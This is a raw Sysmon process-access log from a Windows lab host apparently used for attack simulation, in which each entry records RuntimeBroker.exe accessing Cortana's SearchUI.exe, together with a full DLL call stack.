10341000x80000000000000007669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
